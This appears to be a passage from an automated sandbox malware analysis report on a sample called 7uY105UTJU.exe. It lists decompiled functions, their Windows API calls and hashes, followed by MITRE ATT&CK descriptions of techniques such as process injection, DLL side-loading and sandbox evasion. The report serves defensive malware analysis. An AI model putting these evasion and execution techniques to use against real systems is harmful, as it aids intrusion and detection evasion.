Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nsr144.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsr144.tmp
API String ID: 2655323295-3622376432
Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr144.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405EDF
CharNextW.USER32(00000000), ref: 00405EE4
CharNextW.USER32(00000000), ref: 00405EFC

Strings

C:\Users\user\AppData\Local\Temp\nsr144.tmp, xrefs: 00405ED2

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsr144.tmp
API String ID: 3213498283-3622376432
Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nsr144.tmp, xrefs: 00402688
C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsr144.tmp$C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll
API String ID: 1659193697-2237205556
Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
RegCloseKey.ADVAPI32(?), ref: 00406476

Strings

: Completed, xrefs: 0040642C

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4

Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(00000000), ref: 00403BB5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\7uY105UTJU.exe,C:\Users\user\Desktop\7uY105UTJU.exe,80000000,00000003), ref: 00405E78
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\7uY105UTJU.exe,C:\Users\user\Desktop\7uY105UTJU.exe,80000000,00000003), ref: 00405E88

Strings

C:\Users\user\Desktop, xrefs: 00405E72

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3125694417
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

